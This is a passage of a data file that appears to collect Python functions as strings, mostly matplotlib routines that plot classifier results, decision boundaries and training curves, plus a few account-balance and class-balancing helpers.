balancer_labels[0].append(pt)\n balancer_labels[1].append(balancer_description)\n balancer_index += 1\n i += 1\n data_set_index += 1\n legend = plt.legend(balancer_labels[0] + classifier_labels[0], balancer_labels[1] + classifier_labels[1], loc='lower center', bbox_to_anchor=(0.5, -0.2), fancybox=False, frameon=False, ncol=7)\n legend.get_frame().set_facecolor('#ffffff')\n\n sns.despine()\n current_time = datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")\n plt.savefig(os.path.dirname(os.path.realpath(__file__)) + \"/../results/classifier_dataset_plt_{0}.png\".format(current_time), bbox_extra_artists=((legend,)), bbox_inches='tight')\n plt.close(fig)", "def plot_model_curves(class_name, model, range_metrics, ax):\n def plot_axis(ax, data, color):\n \"\"\"\n Plot data on axis in certain color\n \"\"\"\n x_indices = [0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]\n ax.scatter(x_indices, data, color=color, s=4)\n ax.plot(x_indices, data, color=color, linewidth=2)\n ax.set_yticks([]) # same for y ticks\n ax.set_ylim([0, 1])\n # Get balanced purities\n preds = np.concatenate(model.results)\n if model.name == \"Binary Classifiers\":\n purities = get_binary_balanced_purity_ranges(\n preds, model.class_labels, 0.1, model.class_counts)[class_name]\n else:\n purities = get_balanced_purity_ranges(\n preds, model.class_labels, 0.1, model.class_counts)[class_name]\n\n # Get completenesses\n comps = get_completeness_ranges(model.class_counts, range_metrics, class_name)\n\n print(\"\\n\\n Model: \" + str(model.name) + \", class: \" + class_name)\n print(\"Completeness\")\n print(comps)\n print(\"Purity\")\n print(purities)\n\n plot_axis(ax, comps, C_BAR_COLOR)\n ax2 = ax.twinx() # instantiate a second axes that shares the same x-axis\n ax2.set_ylim([0, 1])\n plot_axis(ax2, purities, P_BAR_COLOR)\n for axis in ['top', 'bottom', 'left', 'right']:\n ax.spines[axis].set_linewidth(1.5)\n return ax2", "def plot_balance_list(balance_list, b_scale='linear', progress = False, n_lims = None):\n if n_lims == None:\n n_min = 0\n n_max=len(balance_list)\n else:\n n_min = n_lims[0]\n n_max = n_lims[1]\n ncols=2\n nrows=int(np.ceil((n_max-n_min)/ncols))\n _, axes = plt.subplots(nrows, ncols, figsize=(22, 5*nrows))\n for n in range(n_min, n_max):\n ni = n-n_min \n i = int(np.floor(ni / ncols))\n j=ni % ncols\n r_p = []\n if progress: \n for k in range(len(balance_list[n])-1):\n r_p.append(np.abs(balance_list[n][k]-balance_list[n][k+1])/balance_list[n][k])\n\n axes[i,j].plot(balance_list[n], label='balance', color='b')#we put [1:] because want 
not to show drop in the beginning: TODO: understand fully and explain\n axes[i,j].set_title('Outer loop # '+ str(n))\n # axes[i,j].set_yscale('log')\n # axes[i,j].set_xscale('log')\n axes[i,j].grid(True)\n axes[i,j].set_ylabel('balance norm')\n axes[i,j].legend()\n axes[i,j].set_yscale(b_scale)\n if progress: \n ax_2=axes[i,j].twinx()\n ax_2.plot(r_p, 'g')\n ax_2.set_yscale('log')\n ax_2.set_ylabel('relative change')", "def drawLines_income(t0, t1, t2, t3):\r\n t0.pd()\r\n t1.pd()\r\n t2.pd()\r\n t3.pd()\r\n t0.pencolor(\"blue\")\r\n t0.pensize(3)\r\n t1.pensize(3)\r\n t2.pensize(3)\r\n t3.pensize(3)\r\n t1.pencolor(\"red\")\r\n t2.pencolor(\"green\")\r\n t3.pencolor(\"gold\")\r\n t0.rt(90)\r\n t1.rt(90)\r\n t2.rt(90)\r\n t3.rt(90)\r\n t0.fd(70)\r\n t1.fd(70)\r\n t2.fd(70)\r\n t3.fd(70)", "def plot_exp1():\n legend = ['unweighted', 'weighted']\n labels = ['Degree','Closeness','Current-flow closeness','Betweenness','Current-flow betweenness','Load','Eigenvector','PageRank','HITS authorities','HITS hubs']\n\n # classification\n d = [[0.52500000000000002,0.49444444444444446], # Degree\n [0.57499999999999996,0.57499999999999996], # Closeness\n [0.56944444444444442,0.58333333333333337], # Current-flow closeness\n [0.36388888888888887,0.36944444444444446], # Betweenness\n [0.23333333333333334,0.20833333333333334], # Current-flow betweenness\n [0.35555555555555557,0.36666666666666664], # Load\n [0.49722222222222223,0.45555555555555555], # Eigenvector\n [0.52777777777777779,0.51111111111111107], # PageRank\n [0.49722222222222223,0.45555555555555555], # HITS authorities\n [0.49722222222222223,0.45555555555555555]] # HITS hubs\n ys = {0:'0.0',.1:'0.1',.2:'0.2', .3:'0.3',.4:'0.4',.5:'0.5',.6:'0.6'}\n fig = plotter.tikz_barchart(d, labels, scale = 3.5, yscale=2.8, color='black', legend=legend, legend_sep=1.0, tick=False, y_tics=ys)\n data.write_to_file(fig,'../../masteroppgave/report/imgs/tikz/dependency_eval_class.tex',mode='w')\n\n # retrieval\n d = [[0.18149811054435275,0.18821229318222113], # Degree\n [0.17184314735361236,0.18216618328598347], # Closeness\n [0.14606637651984622,0.13586098100141117], # Betweenness\n [0.17399729543537901,0.17613717518129621], # Current-flow closeness\n [0.042019078720146409,0.042019078720146409], # Current-flow betweenness\n [0.14700372822743263,0.15104493506838745], # Load\n [0.19854658693196564,0.17540014008712554], # Eigenvector\n [0.17725358882165362,0.17252331100724849], # PageRank\n [0.19854658693196564,0.17540014008712554], # HITS authorities\n [0.19854658693196564,0.17540014008712554]] # HITS hubs\n ys = {0:'0.0',.05:'0.05', .1:'0.1',.15:'0.15', .2:'0.2'}\n fig = plotter.tikz_barchart(d, labels, scale = 3.5, yscale=8, color='black', legend=legend, legend_sep=1.0, tick=False, grid_step=0.05, y_tics=ys)\n data.write_to_file(fig,'../../masteroppgave/report/imgs/tikz/dependency_eval_retr.tex',mode='w')", "def inclass1():\n import numpy as np\n import matplotlib.pyplot as plt\n\n\n N = 50\n x = np.random.rand(N)\n y = np.random.rand(N)\n colors = np.random.rand(N)\n area = np.pi * (15 * np.random.rand(N))**2 # 0 to 15 point radiuses\n\n plt.scatter(x, y, s=area, c=colors, alpha=0.5)\n plt.show()", "def plot(self):\r\n \r\n\r\n print(\"Printing decision surfaces of decision trees\")\r\n plot_colors = \"rb\"\r\n plot_step = 0.02\r\n n_classes = 2\r\n for _ in range (self.n_estimators):\r\n plt.subplot(2, 3, _ + 1)\r\n x_min, x_max = self.X.iloc[:, 0].min() - 1, self.X.iloc[:, 0].max() + 1\r\n y_min, y_max = self.X.iloc[:, 1].min() - 1, self.X.iloc[:, 1].max() + 
1\r\n xx, yy = np.meshgrid(np.arange(x_min, x_max, plot_step),np.arange(y_min, y_max, plot_step))\r\n plt.tight_layout(h_pad=0.5, w_pad=0.5, pad=2.5)\r\n Z = self.clfs[_].predict(np.c_[xx.ravel(), yy.ravel()])\r\n Z = np.array(Z)\r\n Z = Z.reshape(xx.shape)\r\n cs = plt.contourf(xx, yy, Z, cmap=plt.cm.RdBu)\r\n for i, color in zip(range(n_classes), plot_colors):\r\n if i == 0:\r\n idx = np.where(self.y == -1)\r\n if i == 1:\r\n idx = np.where(self.y == 1)\r\n for i in range (len(idx[0])):\r\n plt.scatter(self.X.loc[idx[0][i]][0], self.X.loc[idx[0][i]][1],c=color,cmap=plt.cm.RdBu, edgecolor='black', s=15)\r\n plt.suptitle(\"Decision surface of a decision tree using paired features\")\r\n plt.legend(loc='lower right', borderpad=0, handletextpad=0)\r\n plt.axis(\"tight\")\r\n\r\n plt.show()\r\n fig1 = plt\r\n\r\n # Figure 2\r\n print(\"Printing decision surface by combining the individual estimators\")\r\n plot_colors = \"rb\"\r\n plot_step = 0.02\r\n n_classes = 2\r\n x_min, x_max = self.X.iloc[:, 0].min() - 1, self.X.iloc[:, 0].max() + 1\r\n y_min, y_max = self.X.iloc[:, 1].min() - 1, self.X.iloc[:, 1].max() + 1\r\n xx, yy = np.meshgrid(np.arange(x_min, x_max, plot_step),np.arange(y_min, y_max, plot_step))\r\n plt.tight_layout(h_pad=0.5, w_pad=0.5, pad=2.5)\r\n Z = config.Classifier_AB.predict(np.c_[xx.ravel(), yy.ravel()])\r\n Z = np.array(Z)\r\n Z = Z.reshape(xx.shape)\r\n cs = plt.contourf(xx, yy, Z, cmap=plt.cm.RdBu)\r\n for i, color in zip(range(n_classes), plot_colors):\r\n if i == 0:\r\n idx = np.where(self.y == -1)\r\n if i == 1:\r\n idx = np.where(self.y == 1)\r\n for i in range (len(idx[0])):\r\n plt.scatter(self.X.loc[idx[0][i]][0], self.X.loc[idx[0][i]][1],c=color,cmap=plt.cm.RdBu, edgecolor='black', s=15)\r\n plt.suptitle(\"Decision surface by combining individual estimators\")\r\n plt.legend(loc='lower right', borderpad=0, handletextpad=0)\r\n plt.axis(\"tight\")\r\n\r\n plt.show()\r\n fig2 = plt\r\n\r\n return [fig1,fig2]", "def figure_10_12_b():\n xs = np.arange(-6,6,0.1)\n plt.plot(xs,sigmoid(xs))\n x=2.5\n plt.scatter(x,sigmoid(x))\n plt.plot(xs,logistic_lower_bound(xs,x))\n plt.show()", "def draw(self, amount):\n # make sure balance doesn't go below zero\n self.__balance = max(self.__balance-amount, 0)\n return self.__balance", "def plot_associative_learning_progress(ax, df):\n\n num_objects_list = sorted(df.curr_num_objects.unique())\n legend_list = []\n for idx in num_objects_list:\n ax.plot(df[df.curr_num_objects == idx].groupby('objects_iter').rewards.mean())\n legend_list.append(f'ns={idx}')\n ax.set_xlabel('Stimulus iteration')\n ax.set_ylabel('P(correct)')\n ax.set_ylim([0.4, 1])\n ax.legend(legend_list)", "def displayBalance(self):\n orders = self.trader.tradeData.get(\n 'openOrders',\n 'Failed to read orderCount')\n# uncomment 3 lines below for orderType debug printing\n## ordertype = type(orders)\n# print'DEBUG: helper.displayBalance orders TYPE is',ordertype\n# print'DEBUG: helper.displayBalance orders:',orders\n if isinstance(orders, int) and orders > 0:\n print\"Open Orders:\", orders\n self.processOrders(printOutput=True)\n self.separator()\n print'Available Balances:'\n funds = self.trader.tradeData['funds']\n for bal in funds.keys():\n if funds[bal] >= 0.01:\n print bal.upper() + ':', funds[bal]\n self.separator()", "def printBalance(self):\n\n print(\"\\nBalance - {self.name}\".format(self=self))\n print(\"Account balance: £{self.balance:.2f}\".format(self=self))", "def __init__(self, balance=0):\n self.balance = balance", "def create_graph(self, 
backtest):\n \n # check number of currencies\n no_currencies = len(np.unique(signals.currency_id))\n \n # plot capital\n fig, ax = plt.subplots(1+no_currencies/2,2)\n ax[0, 0].plot(backtest.capital)\n ax[0, 1].plot(backtest.capital) \n \n # plot each currency \n \n return true", "def plot_class_distribution(labels):\n num_classes = get_num_classes(labels)\n count_map = Counter(labels)\n counts = [count_map[i] for i in range(num_classes)]\n idx = np.arange(num_classes)\n plt.bar(idx, counts, width=0.8, color='b')\n plt.xlabel('Class')\n plt.ylabel('Number of samples')\n plt.title('Class distribution')\n plt.xticks(idx, idx)\n plt.show()", "def parity_plot(y_pred, y_act):\n\n fig = plt.figure(figsize=FIG_SIZE)\n plt.scatter(y_act, y_pred)\n plt.plot([y_act.min(), y_act.max()], [y_act.min(), y_act.max()],\n lw=4, color='r')\n plt.xlabel('Actual')\n plt.ylabel('Predicted')\n\n return fig", "def plot_progression(weights, bhs, bvs):\n\tweights_plot = []\n\tfor i in range(40):\n\t\tweights_plot.append(weights[i][0][0])\t# only plots the first value in the matrix every time\n\tplt.plot(weights_plot)\n\n\tplt.show()", "def plot_percentage_difference_graph(results, datasets, name_suffix=\"\", parameter=\"BACC\", x_label=\"Feature selection approach\", difference_from=\"no feature selection\", figsize=(16, 5), legend_y=None,\n label_rotation=0, y_label_pos=None, y_ticks=None, x_label_replacement_dict=None, feature_selection_specific=False):\n if x_label_replacement_dict is None:\n x_label_replacement_dict = {}\n\n if (len(results) == 1 or len(results) == 2) or legend_y is None:\n legend_y = -0.31\n\n if len(results) == 1 or len(results) == 2:\n y_label_pos = 0.5\n if len(results) < 4 and y_label_pos is None:\n y_label_pos = 0\n elif y_label_pos is None:\n y_label_pos = -0.4\n # Output a raw dump of results to file so that it can be used to tweak visualisation without re-executing experiment\n current_time = datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")\n file_name = \"raw_dump_{0}.txt\".format(current_time)\n with open(os.path.dirname(os.path.realpath(__file__)) + \"/../results/\" + file_name, \"wb\") as output_file:\n output_file.write(str(results))\n patterns = (None, \"////\")\n\n colors = [\"#64B3DE\", \"#1f78b4\", \"#FBAC44\", \"#B9B914\", \"#bc1659\", \"#33a02c\", \"#6ABF20\", \"#ff7f00\", \"#6a3d9a\", \"#5a2add\", \"#b15928\", \"#e31a1c\", \"grey\"]\n classifier_arr = []\n for i in range(len(results)):\n classifier_arr.append(list())\n index = 0\n\n # Calculate difference in BACC from first entry as well as mean difference across classifiers\n for results_per_classifier in results:\n no_feature_selection = results[index][0][1]\n for i in range(len(no_feature_selection) + 1):\n classifier_arr[index].append(list())\n for i in range(1, len(results_per_classifier)):\n data_balancer_results = results_per_classifier[i][1]\n x = 0\n mean_classification = 0\n for result_tuple in data_balancer_results:\n value = result_tuple[0][2] - no_feature_selection[x][0][2]\n classifier_arr[index][x].append(value)\n mean_classification += value\n x += 1\n mean_classification /= float(len(data_balancer_results))\n classifier_arr[index][x].append(mean_classification)\n index += 1\n\n fig = plt.figure(figsize=figsize)\n\n classifiers = np.arange(len(classifier_arr[0]))\n\n bar_width = 0.2\n opacity = 0.9\n num_columns = 1 if len(results) == 1 else 2\n subplt_val = (100 * round(len(results) / 2.0)) + (10 * num_columns) + 1\n plt.subplots_adjust(hspace=0.42, wspace=0.1)\n ax1 = plt.subplot(subplt_val)\n\n for i in 
range(len(classifier_arr[0])):\n if i + 1 != len(classifier_arr[0]):\n label = results[0][0][1][i][1]\n else:\n label = \"Mean classification\"\n data_balancers = np.arange(len(classifier_arr[0][i])) * 3\n plt.bar(data_balancers + (i * bar_width), classifier_arr[0][i], bar_width,\n alpha=opacity,\n color=colors[i],\n hatch=patterns[i % len(patterns)],\n label=label)\n\n feature_selection_labels = [results[0][i][0] if results[0][i][0] not in x_label_replacement_dict else x_label_replacement_dict[results[0][i][0]] for i in range(1, len(results[0]))]\n if feature_selection_specific:\n feature_selection_labels = [feature_selection_labels[i - 1] + \"\\n{0}-{1:.1f}-{2}\".format(results[0][i][1][0][4][0], results[0][i][1][0][4][1], results[0][i][1][0][4][2]) for i in\n range(1, len(results[0]))]\n\n plt.xticks(data_balancers + (bar_width / 2) * len(classifiers), feature_selection_labels, rotation=label_rotation)\n bonus = \"\"\n if feature_selection_specific:\n bonus = \" ({0})\".format(results[0][0][1][0][4][3])\n plt.title(datasets[0].replace(\"_\", \" \") + bonus)\n plt.ylabel(\"Change in {0} from {1}\".format(parameter, difference_from), y=y_label_pos)\n\n vertical_plt = 0\n for z in range(1, len(results)):\n ax2 = plt.subplot(subplt_val + z, sharey=ax1)\n color = iter(cm.Set1(np.linspace(0, 1, len(no_feature_selection) + 1)))\n for i in range(len(classifier_arr[z])):\n if i + 1 != len(classifier_arr[z]):\n label = results[z][0][1][i][1]\n else:\n label = \"Mean classification\"\n data_balancers = np.arange(len(classifier_arr[z][i])) * 3\n plt.bar(data_balancers + (i * bar_width), classifier_arr[z][i], bar_width,\n alpha=opacity,\n color=colors[i],\n hatch=patterns[i % len(patterns)],\n label=label)\n\n feature_selection_labels = [results[0][i][0] if results[0][i][0] not in x_label_replacement_dict else x_label_replacement_dict[results[0][i][0]] for i in range(1, len(results[0]))]\n if feature_selection_specific:\n feature_selection_labels = [feature_selection_labels[i - 1] + \"\\n{0}-{1:.1f}-{2}\".format(results[z][i][1][0][4][0], results[z][i][1][0][4][1], results[z][i][1][0][4][2]) for i in\n range(1, len(results[0]))]\n\n plt.xticks(data_balancers + (bar_width / 2) * len(classifiers), feature_selection_labels, rotation=label_rotation)\n bonus = \"\"\n if feature_selection_specific:\n bonus = \" ({0})\".format(results[z][0][1][0][4][3])\n plt.title(datasets[z].replace(\"_\", \" \") + bonus)\n\n current_time = datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")\n\n if len(results) >= 4:\n legend_x = -0.08\n elif len(results) == 1:\n legend_x = 0.5\n elif len(results) == 2:\n legend_x = 0\n else:\n legend_x = 1\n\n legend = plt.legend(loc='lower center', bbox_to_anchor=(legend_x, legend_y), fancybox=True, frameon=True, ncol=7)\n legend.get_frame().set_facecolor('#ffffff')\n\n if y_ticks is not None:\n plt.yticks(y_ticks)\n plt.ylim(ymin=y_ticks[0])\n plt.ylim(ymax=y_ticks[-1])\n\n x_label_x_pos = 0\n if len(results) == 1:\n x_label_x_pos = 0.5\n elif len(results) == 3:\n x_label_x_pos = 1\n plt.xlabel(x_label, x=x_label_x_pos, y=-2)\n feature_selection_labels = [results[0][i][0] for i in range(1, len(results[0]))]\n\n plt.locator_params(axis='y', nbins=15)\n name = \"{3}_results_per_classifier_plot{0}_{4}_{1}_{2}\".format(name_suffix, parameter, current_time, x_label, datasets)\n plt.savefig(os.path.dirname(os.path.realpath(__file__)) + \"/../results/{0}\".format(name.replace(\" \", \"_\")), bbox_extra_artists=(legend,), bbox_inches='tight')\n plt.close(fig)", "def plotpayoff(self):\n 
plt.figure()\n payoff = list(map(lambda x:max(x-self.s,0.0),self.pricetree[-1,:]))\n plt.plot(payoff)\n plt.title(\"Payoff Distribution\")\n plt.show()", "def plot(self):\n self.plotsite()\n self.plotbond()\n plt.show()", "def plot_prediction(self, img, probs, classes):\n\n # Convert results to dataframe for plotting\n result = pd.DataFrame({\"p\": probs}, index=classes)\n\n # Show the image\n fig = plt.figure(figsize=(16, 5))\n ax = plt.subplot(1, 2, 1)\n ax.imshow(img)\n\n # Set title to be the actual class\n ax.set_title(\"\", size=20)\n\n ax = plt.subplot(1, 2, 2)\n # Plot a bar plot of predictions\n result.sort_values(\"p\")[\"p\"].plot.barh(color=\"blue\", edgecolor=\"k\", ax=ax)\n plt.xlabel(\"Predicted Probability\")\n plt.tight_layout()\n\n return fig", "def visclassifier(fun,xTr,yTr):\n\n yTr = np.array(yTr).flatten()\n \n symbols = [\"ko\",\"kx\"]\n marker_symbols = ['o', 'x']\n mycolors = [[0.5, 0.5, 1], [1, 0.5, 0.5]]\n classvals = np.unique(yTr)\n\n plt.figure()\n\n res=300\n xrange = np.linspace(min(xTr[:, 0]), max(xTr[:, 0]),res)\n yrange = np.linspace(min(xTr[:, 1]), max(xTr[:, 1]),res)\n pixelX = repmat(xrange, res, 1)\n pixelY = repmat(yrange, res, 1).T\n\n xTe = np.array([pixelX.flatten(), pixelY.flatten()]).T\n\n testpreds = fun(xTe)\n Z = testpreds.reshape(res, res)\n # Z[0,0] = 1 # optional: scale the colors correctly\n plt.contourf(pixelX, pixelY, np.sign(Z), colors=mycolors)\n\n for idx, c in enumerate(classvals):\n plt.scatter(xTr[yTr == c,0],\n xTr[yTr == c,1],\n marker=marker_symbols[idx],\n color='k'\n )\n\n plt.axis('tight')\n plt.show()", "def dif_plot(sp, x, y, seqmin, seqmax):\n sp.bar(x, y, color='gray')\n sp.set_xlim(seqmin, seqmax)\n sp.xaxis.set_major_locator(MaxNLocator(15))\n sp.set_xlabel('Residue')\n sp.set_ylabel('Difference')\n sp.grid(False)\n sp.axhline(y=0, linewidth=1, color='black')", "def plot_graph(self) -> None:", "def plot_sum(self):\n fig, ax = plt.subplots()\n ax.set_title(\"Unpolarized intensity: I_up + I_down\")\n ax.set_xlabel(\"Time (microseconds)\")\n ax.set_ylabel('Intensity')\n\n if (self.is_attribute(\"time\") & self.is_attribute(\"intensity_up\") & \n self.is_attribute(\"intensity_up_sigma\") &\n self.is_attribute(\"intensity_down\") & \n self.is_attribute(\"intensity_down_sigma\") &\n self.is_attribute(\"intensity_up_total\") &\n self.is_attribute(\"intensity_down_total\")):\n np_excl = numpy.array(self.excluded, dtype=bool)\n np_notexcl = numpy.logical_not(np_excl)\n np_time = numpy.array(self.time, dtype=float)\n np_up = numpy.array(self.intensity_up, dtype=float)\n np_sup = numpy.array(self.intensity_up_sigma, dtype=float)\n np_up_mod = numpy.array(self.intensity_up_total, dtype=float)\n np_down = numpy.array(self.intensity_down, dtype=float)\n np_sdown = numpy.array(self.intensity_down_sigma, dtype=float)\n np_down_mod = numpy.array(self.intensity_down_total, dtype=float)\n np_sum = np_up + np_down\n np_sum_mod = np_up_mod + np_down_mod\n np_ssum = numpy.sqrt(numpy.square(np_sup)+numpy.square(np_sdown))\n ax.plot(np_time, np_sum_mod, \"k-\", label=\"model\")\n ax.errorbar(np_time[np_notexcl], np_sum[np_notexcl], yerr=np_ssum[np_notexcl], fmt=\"ko\", alpha=0.2, label=\"experiment\")\n ax.errorbar(np_time[np_excl], np_sum[np_excl], yerr=np_ssum[np_excl], fmt=\"rs\", alpha=0.2, label=\"excluded\")\n\n y_min_d, y_max_d = ax.get_ylim()\n param = y_min_d-(np_sum - np_sum_mod).max()\n coeff = np_notexcl.astype(int)\n\n ax.plot([np_time.min(), np_time.max()], [param, param], \"k:\")\n ax.plot(np_time, coeff*(np_sum - 
np_sum_mod)+param, \"r-\", alpha=0.7,\n label=\"difference\")\n elif (self.is_attribute(\"time\") & self.is_attribute(\"intensity\") & \n self.is_attribute(\"intensity_total\") &\n self.is_attribute(\"intensity_sigma\")):\n np_excl = numpy.array(self.excluded, dtype=bool)\n np_notexcl = numpy.logical_not(np_excl)\n np_time = numpy.array(self.time, dtype=float)\n np_sum = numpy.array(self.intensity, dtype=float)\n np_sum_mod = numpy.array(self.intensity_total, dtype=float)\n np_ssum = numpy.array(self.intensity_sigma, dtype=float)\n ax.plot(np_time, np_sum_mod, \"k-\", label=\"model\")\n ax.errorbar(np_time[np_notexcl], np_sum[np_notexcl], yerr=np_ssum[np_notexcl], fmt=\"ko\", alpha=0.2, label=\"experiment\")\n ax.errorbar(np_time[np_excl], np_sum[np_excl], yerr=np_ssum[np_excl], fmt=\"rs\", alpha=0.2, label=\"excluded\")\n\n y_min_d, y_max_d = ax.get_ylim()\n param = y_min_d-(np_sum - np_sum_mod).max()\n coeff = np_notexcl.astype(int)\n\n ax.plot([np_time.min(), np_time.max()], [param, param], \"k:\")\n ax.plot(np_time, coeff*(np_sum - np_sum_mod)+param, \"r-\", alpha=0.7,\n label=\"difference\")\n ax.legend(loc='upper right')\n fig.tight_layout()\n return (fig, ax)", "def learning_viz(self) :\n self.train\n history = self.history\n plot_loss(history)", "def balance_classes(df):\n df_class_0 = df[df[65]==0]\n df_class_1 = df[df[65]==1]\n df_count = df[65].value_counts()\n count_0 = df_count[0]\n count_1 = df_count[1]\n\n if count_0 > count_1:\n df_class_1_over = df_class_1.sample(count_0, replace=True)\n df_over = pd.concat([df_class_0, df_class_1_over], axis=0)\n elif count_0 < count_1:\n df_class_0_over = df_class_0.sample(count_1, replace=True)\n df_over = pd.concat([df_class_1, df_class_0_over], axis=0)\n else:\n df_over = df\n \n return df_over", "def plotSVMProfile(self, df_class=None, is_plot=True, **kwargs):\n # Use getimportance for each class and each clf to get average\n # importance value for each feature\n # Construct importance dataframes by class\n COLORS = [\"blue\", \"red\", \"green\", \"brown\"]\n if df_class is None:\n dfs = [self.makeImportanceDF(class_selection=c) for c in self.classes]\n else:\n dfs = []\n for cls in df_class.index:\n ser_X = df_class.loc[cls, :]\n # Accumulate the feature contribution for each classifier\n # over the class averaged values\n sers = [self.clf_desc.getFeatureContributions(\n c, self.columns, ser_X).loc[cls, :] for c in self.clfs]\n df_values = pd.concat(sers, axis=1)\n df = self._makeFeatureDF(df_values)\n dfs.append(df)\n ymin = 0.9*min([df.values.flatten().min() for df in dfs])\n ymax = 1.1*max([df.values.flatten().max() for df in dfs])\n ylim = [ymin, ymax]\n fig, axes = plt.subplots(1, len(dfs))\n is_first = True\n for cls, ax, df in zip(self.classes, axes, dfs):\n df_new = df.sort_index(ascending=False)\n self._plot(df_new, None, fig, ax, False, is_vertical=False,\n is_ygrid=False, color=COLORS,\n ylim=ylim, **kwargs)\n ax.plot([0, 0], [0, len(df)])\n if is_first:\n is_first = False\n else:\n ax.set_ylabel(\"\")\n ax.set_yticklabels([])\n if self._class_names is not None:\n title = self._class_names[cls]\n else:\n title = str(cls)\n ax.set_title(title)\n if is_plot:\n plt.show()", "def decisionBoundary(root, figure, fileName):\n stepValue = 0.001\n classClassification = [1, 2, 3, 4]\n colorClassification = ['b', 'g', 'r', 'm']\n markerClassification = ['x', '+', '*', 'o']\n classesList = [\"Bolts\", \"Nuts\", \"Rings\", \"Scraps\"]\n decisionPlot = figure.add_subplot(111)\n attributeValues, classes, _ = readData(fileName)\n 
attributeValues = np.array(attributeValues)\n classes = np.array(classes)\n \n \n\n attribute1, attribute2 = np.meshgrid(np.arange(0, 1, stepValue), np.arange(0, 1, stepValue))\n\n predicted_class = []\n for i in range(attribute1.shape[0]):\n predicted_class.append([])\n for j in range(attribute1.shape[1]):\n result = [attribute1[i][j], attribute2[i][j]]\n predicted_value = classify(np.array(result), root)\n predicted_class[i].append(predicted_value)\n\n decisionPlot.contourf(attribute1, attribute2, np.array(predicted_class))\n\n for a in classClassification:\n attribute1=[]\n attribute2=[]\n \n for j in range(len(attributeValues[:])):\n \n if classes[j]==a:\n attribute1 +=[attributeValues[j][0]]\n for k in range(len(attributeValues[:])):\n if classes[k]==a:\n attribute2 +=[attributeValues[k][1]]\n \n \n decisionPlot.scatter(attribute1, attribute2, color=colorClassification[a - 1], marker=markerClassification[a - 1]\n , label=classesList[a - 1], s=100)\n\n decisionPlot.legend(loc='upper right')\n decisionPlot.set_xlabel(\"Six fold Rotational Symmetry\")\n decisionPlot.set_ylabel(\"Eccentricity\")\n decisionPlot.set_title(\"Decision boundary\")\n return decisionPlot", "def __init__(self):\n self.balance = 0", "def show_balance(cls):\n if cls.is_logged_in():\n print(f'\\nBalance: {cls.__current_acct.__get_balance()}\\n')", "def acc_loss_graph(self):\n acc = self.history['accuracy']\n val_acc = self.history['val_accuracy']\n loss = self.history['loss']\n val_loss = self.history['val_loss']\n plt.figure(figsize=(15, 5))\n plt.subplot(1, 2, 1)\n plt.plot(acc, label='Train')\n plt.plot(val_acc, label='Val')\n plt.legend(loc='lower right')\n plt.ylabel('Accuracy')\n plt.xlabel('Epoch')\n plt.ylim([min(plt.ylim()), 1])\n plt.title('Accuracy')\n\n plt.subplot(1, 2, 2)\n plt.plot(loss, label='Train')\n plt.plot(val_loss, label='Val')\n plt.legend(loc='lower right')\n plt.ylabel('Loss')\n plt.xlabel('Epoch')\n plt.ylim([0, max(plt.ylim())])\n plt.title('Loss')\n plt.show();", "def balance_set(X, Y, adr_labels_size, nonadr_labels_size):\n\n print(\"Performing Class Balancing...\")\n adr_samples_needed = nonadr_labels_size - adr_labels_size\n new_X = []\n new_Y = []\n adr_labels_size = 0\n nonadr_labels_size = 0\n\n for index, example in enumerate(X):\n if adr_samples_needed > 0:\n if Y[index] == ADR_MENTION_CLASS_LABEL:\n new_X.append(example) # add original 'ADR' sample\n new_Y.append(ADR_MENTION_CLASS_LABEL)\n new_X.append(example) # add duplicate 'ADR' sample to perform Over-Sampling\n new_Y.append(ADR_MENTION_CLASS_LABEL)\n\n adr_labels_size += 2\n adr_samples_needed -= 1\n else:\n # we don't add original 'No ADR Mention' sample to perform Under-Sampling\n adr_samples_needed -= 1\n\n else:\n if Y[index] == ADR_MENTION_CLASS_LABEL:\n adr_labels_size += 1\n else:\n nonadr_labels_size += 1\n\n new_X.append(example) # add original sample\n new_Y.append(Y[index]) # add original label\n\n print(\" Updated dataset size: {}\".format(len(new_X)))\n print(\" {} class size: {}\".format(ADR_MENTION_CLASS_NAME, adr_labels_size))\n print(\" {} class size: {}\".format(NON_ADR_MENTION_CLASS_NAME, nonadr_labels_size))\n\n return new_X, new_Y", "def show_balance(self):\n\t\tbalance = 0\n\t\tfor acct in self.wallet:\n\t\t\tutxos = get_unspent(acct[\"address\"], self.testnet)\n\t\t\tbalance += sum(i['value'] for i in utxos)\n\t\treturn f\"{self.name} current balance: {str(balance/100000000.0)} BTC\"", "def plot(self):\n pass", "def balance_classes(data, labels):\n\n index_dict = {}\n\n for idx, label in 
enumerate(labels):\n if label not in index_dict:\n index_dict[label] = [idx]\n else:\n index_dict[label] += [idx]\n\n index_list = list(index_dict.values())\n\n min_balanced_number = min([len(l) for l in index_list])\n\n index_to_take_list = np.concatenate([\n np.random.choice(l, min_balanced_number, replace=False)\n for l in index_list\n ])\n\n np.random.shuffle(index_to_take_list)\n\n return data[index_to_take_list], labels[index_to_take_list]", "def plot_class_distribution(data):\n classes = [r[0] for r in data]\n plt.hist(classes)\n plt.xlabel('Labels')\n plt.ylabel('Counts')\n plt.title('Histogram of class counts')\n plt.show()", "def plot_class_scatter(rows_of_class, class_name, max_value, min_value):\n fig = plt.figure(figsize=(30, 5))\n fig.suptitle(\"Components for class {}\".format(class_name))\n function_to_channel_plots = {function_name: [] for function_name in [\"Mean\", \"Min\", \"Max\"]}\n n_plots = 1\n # For each function\n for function_idx, function_name in enumerate(function_to_channel_plots):\n # For each channel\n for channel_idx in range(0, 4):\n plot = fig.add_subplot(1, 14, n_plots + function_idx)\n channel_number = ((n_plots - 1) % 4) + 1\n plot.set_title(\"{} of Channel {}\".format(function_name, channel_number))\n plot.set_xlabel(\"Components\")\n # Only need title for first graph for each function\n if channel_idx == 0:\n plot.set_ylabel(\"{} of 100 pulses\".format(function_name))\n\n plot.set_ylim((min_value, max_value))\n function_to_channel_plots[function_name].append(plot)\n n_plots += 1\n\n components_per_function = 256\n components_per_channel = 64\n for index, row in rows_of_class.iterrows():\n for function_idx, (function, channel_plots) in enumerate(function_to_channel_plots.items()):\n for channel_idx, channel_plot in enumerate(channel_plots):\n x = np.arange(0, components_per_channel)\n start = (function_idx * components_per_function) + (channel_idx * components_per_channel)\n end = start + components_per_channel\n y = row[start:end]\n channel_plot.scatter(x, y, alpha=0.8)\n\n plt.savefig(\"{}.png\".format(class_name))", "def 